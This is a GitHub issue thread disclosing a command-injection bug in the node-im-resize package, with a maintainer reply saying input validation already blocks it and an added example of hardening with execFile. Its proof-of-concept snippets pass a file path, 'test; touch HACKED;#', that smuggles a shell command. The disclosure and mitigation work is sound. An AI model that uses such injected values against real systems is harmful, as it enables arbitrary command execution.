Open huntr-helper opened 4 years ago
NPM version is vulnerable but I think this bug is a false positive for the git version, since code injection is mitigated in:
https://github.com/Turistforeningen/node-im-resize/blob/master/index.js#L10
In commit de624dacf6a50e39fe3472af1414d44937ce1f03 of Feb 3
Instead of using the npm version, the test should be executed against the git version, after cloning, like:

```js
// poc.js
//var resize = require('im-resize');
var resize = require('./');
var image = {
  path: 'test; touch HACKED;#',
  width: 5184,
  height: 2623
};
var output = {
  versions: [{
    suffix: '-thumb',
    maxHeight: 150,
    maxWidth: 150,
    aspect: "3:2"
  },{
    suffix: '-square',
    maxWidth: 200,
    aspect: "1:1"
  }]
};
resize(image, output, function(error){console.log()});
```

Execute by:

```sh
npm i aspectratio # Install required module
node poc.js # Run the PoC
```

Will yield:

```
Input Validation failed, Suspicious Characters found
```

stopping execution and avoiding code injection
exec is called in https://github.com/Turistforeningen/node-im-resize/blob/master/index.js#L13 so trying to call directly https://github.com/Turistforeningen/node-im-resize/blob/master/index.js#L115 will produce a string and not code execution.
PS. I would suggest granting the bounty considering the time it took me to test and document this as well as helping improve huntr bug quality
This issue has been generated on-behalf of Mik317 (https://huntr.dev/app/users/Mik317)
Vulnerability Description

The issue occurs because a `user input` is formatted inside a `command` that will be executed without any check. The issue arises here: https://github.com/Turistforeningen/node-im-resize/blob/master/index.js#L115

Steps To Reproduce:

```js
// Load the published npm package (the version this report targets)
var resize = require('im-resize');
var image = { path: 'test; touch HACKED;#', width: 5184, height: 2623 };
var output = { versions: [{ suffix: '-thumb', maxHeight: 150, maxWidth: 150, aspect: "3:2" },{ suffix: '-square', maxWidth: 200, aspect: "1:1" }] };
resize(image, output, function(error){console.log()});
```

`HACKED` has been created

Bug Bounty
We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/
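
As an added example (not code from node-im-resize or from either post above), the sketch below contrasts a path formatted into a shell string with an argument array passed to `execFile`, plus an allowlist check on the path. The `convert` template, the helper names and the regular expression are assumptions made for illustration.

```javascript
// Added example: hypothetical helpers, not the project's own code.
const { execFileSync } = require('child_process');

// Allowlist (an assumption, not the project's validation): letters, digits,
// '_', '.', '/', '-' only, and no leading '-' so a path cannot pose as an option.
const SAFE_PATH = /^(?!-)[A-Za-z0-9_.\/-]+$/;

function assertSafePath(p) {
  if (typeof p !== 'string' || !SAFE_PATH.test(p)) {
    throw new Error('Input Validation failed, Suspicious Characters found');
  }
  return p;
}

// Vulnerable shape: the path is formatted into one string that a shell would
// parse. Built here for inspection only; it is never passed to exec().
function buildShellString(image, version) {
  return `convert ${image.path} -resize ` +
    `${version.maxWidth}x${version.maxHeight} out${version.suffix}.jpg`;
}

// Hardened shape: one array element per argument, path validated first.
function buildArgv(image, version) {
  return [assertSafePath(image.path), '-resize',
    `${version.maxWidth}x${version.maxHeight}`, `out${version.suffix}.jpg`];
}

// Shows what a child process receives through execFile (no shell involved):
// a child node process, standing in for convert, echoes its arguments as JSON.
function echoArgv(args) {
  const out = execFileSync(process.execPath,
    ['-e', 'console.log(JSON.stringify(process.argv.slice(1)))', '--', ...args],
    { encoding: 'utf8' });
  return JSON.parse(out);
}
```
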